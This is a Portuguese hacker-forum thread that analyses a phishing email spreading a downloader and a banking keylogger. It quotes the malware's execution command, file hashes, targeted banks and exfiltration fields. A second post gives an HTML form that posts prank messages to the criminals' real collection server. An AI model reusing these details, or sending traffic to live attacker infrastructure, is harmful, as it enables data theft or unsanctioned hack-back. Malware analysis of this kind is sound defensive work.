Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Sexta Análise - [FOTOS] - Saudade Dessas Fotos...

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Artigo Sexta Análise - [FOTOS] - Saudade Dessas Fotos...

    Alerta: Se não souber o que esta fazendo não manipule os arquivos dos links pois os mesmos poderão infectar sua máquina.

    No dia 17/08/2010 às 17m 36min recebi um email com o assunto: [FOTOS] - Saudade Dessas Fotos...

    Mensagem

    001852353 (92,1 KB), 001852363.jpg (54,1 KB), 001852312.jpg (78,1 KB), 001852353.jpg (38,1 KB), 001852375.jpg (85,1 KB),
    001852365.jpg (65,6 KB), 001852345.jpg (81,5 KB), 001852312.jpg (53,7 KB), 001852353.jpg (74,5 KB)

    Oi Meu Amor, não me canso de falar que esse dia foi o mais lindo e o mais importante da minha vida, então um beijo na bocaa. Te Amo Muito. Obs: Apague as fotos depois heim!!!

    Ao clicar no link de qualquer uma das imagens Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... somos remetidos para a URL
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... a qual vai baixar o downloader.


    O "Fotos-Nossas.exe" é um downloader que obtem o arquivo:

    [+] Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    >> Arquivo salvo em C:\WINDOWS\system32\Tcp_IP.exe
    >> Após o download este é executado: cmd /k C:\WINDOWS\system32\Tcp_IP.exe


    Os arquivos "Fotos-Nossas.exe" e "TCP_IP.exe" foram protegidos para evitar análise mesmo assim aqui vai algumas informações:

    - Eles funcionam durante 30 dias após a data de proteção.
    - Eles podem ser executados na mesma máquina apenas 100 vezes.
    - md5 [ 03445678127a5b209962f0731b19244a ] -- Fotos-Nossas.exe
    - md5 [ 2884e587c7e8440fd4e21e1de1135f8d ] -- nossas-fotos.src, TCP_IP.exe

    Informações sobre o "TCP_IP.exe"

    - Este keylogger monitora acesso ao Serasa e aos bancos Santander, Centelem, Bradesco, Itaú ....


    As informações capturadas são enviadas para uma aplicação para Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    praquem=antoniolage123@gmail.com
    titulo=.::TCP_INFO::.
    texto=


    Controle de infecção Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    praquem=antoniolage123@gmail.com
    titulo=.::.TCP_INFECT.::.
    texto=

    .::.INFECT.::.
    ---------------------------------------------------
    Nome da Maquina..:
    Dir System32.....:
    MAC..............:
    SystemDrive
    HD Fisico........:
    HD Firmware......:
    IPS..............:
    Data da Abertura.:
    Hora da Abertura.:
    Monitor.........:



    Obs: Esta análise deve ser usada apenas para Estudo, nunca use o conhecimento para eu benefício próprio.


    Autor da Análise: Fidqsi
    Last edited by V3nom; 08-01-2012, 08:55.
    Similar Threads

  • Font Size
    #2
    Mande sua mensagem para o Banker!!

    Mande sua mensagem para o Banker através do formulário abaixo.


    Código HTML:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Turma da Mônica</title>
    </head>
    
    <body>
    <p><strong>.::TCP_INFO::.</strong></p>
    <form id="form1" name="form1" method="post" action="http://69.175.67.37/.saindo/servidor.php" target="_blank">
      <p>praquem 
        <input name="praquem" type="text" id="praquem" value="antoniolage123@gmail.com" size="40" />
    </p>
      <p>Titulo 
        <input name="titulo" type="text" id="titulo" value=".::TCP_INFO::." />
    </p>
      <p>texto: Escreva sua mensagem abaixo </p>
      <p>
        <textarea name="texto" cols="55" rows="4" id="texto">Acesse: http://forum.guiadohacker.com.br/showthread.php?t=10785</textarea>
      </p>
      <p>
        <input type="submit" name="Submit" value="Submit" />
      </p>
    </form>
    <p>&nbsp;</p>
    <p><strong>.::.TCP_INFECT.::.</strong></p>
    <form id="form1" name="form1" method="post" action="http://69.175.67.37/.private/private.php" target="_blank">
      <p>praquem
        <input name="praquem2" type="text" id="praquem2" value="antoniolage123@gmail.com" size="40" />
      </p>
      <p>Titulo
        <input name="titulo2" type="text" id="titulo2" value=".::.TCP_INFECT.::." />
      </p>
      <p>texto: Escreva sua mensagem abaixo </p>
      <p>
        <textarea name="textarea" cols="55" rows="4" id="textarea">.::.INFECT.::.
    ---------------------------------------------------
    Nome da Maquina..: Banker ?
    Dir System32.....: C:\Turma da Mônica
    MAC..............: 00:00:00:BA:BA:CA
    SystemDrive
    HD Fisico........: SIM
    HD Firmware......: Turma da Mônica
    IPS..............: Localhost, 127.0.0.1
    Data da Abertura.: Amanhã
    Hora da Abertura.: Agora
    Monitor.........: Sim
    
    Acesse: http://forum.guiadohacker.com.br/showthread.php?t=10785</textarea>
      </p>
      <p>
        <input type="submit" name="Submit2" value="Submit" />
      </p>
    </form>
    <p></p>
    <p>&nbsp; </p>
    </body>
    </html>

    Comment


    • Font Size
      #3
      Failed!
      kkkkkkkkkkkkkkkkkkkkkkk


      muito boaa Fid!
      \O_
      ~# Criado pela [IN]Segurança #~

      Comment


      • Font Size
        #4
        kkkkkkk os banker vão se junta pra pega você fidqsi rsrsrsrsrs
        muito bom cara, quantas pessoas você já não salvo em !!!!

        Gostou do meu Post? seja educado peça


        Msn: andersondex@hotmail.com
        Skype: dex.oficial

        Comment


        • Font Size
          #5
          Muito Bom ..

          Vlw Fid . Vivendo e aprendendo .

          Comment


          • Font Size
            #6
            HAHA muit boa msm Fid
            =]



            Durante os tempos de mentiras universais, dizer a verdade se torna um ato revolucionário

            Comment


            • Font Size
              #7
              hUAHAUHAUHAUha!!
              Tenso ae!!
              Muito bom mano!!
              HUAHUAhua
              Não te engane. De Deus não se zomba, o que o homem plantar, é o que ele vai colher. (Gálatas 6:7)


              sigpic


              Comment


              • Font Size
                #8
                show de bola veio!!!!
                ________________

                Comment


                • Font Size
                  #9
                  muito bom esse post
                  ________________

                  Comment


                  • Font Size
                    #10
                    nao entendi, sou noob, o que ele ensinou ao certo ?

                    Comment


                    • Font Size
                      #11
                      Muuuito bom, tem pessoas que cai nisso facil, facil ;s
                      Porem outros sai facil e ainda tira onda kk

                      sigpic

                      "Conhecimento não é crime, crime é o que você faz com ele."
                      "Nunca deixe te dizer que você não é capaz"
                      "Vocês podem me acorrentar, torturar e até destruir meu corpo, mas nunca aprisionaram minha mente"




                      Full Access Defacer


                      e-mail & msn: warlockowned@yahoo.com.br


                      Comment


                      • Font Size
                        #12
                        parabens pelo post, vc salvou muita gente kkkkkk

                        Comment

                        X
                        Working...
                        X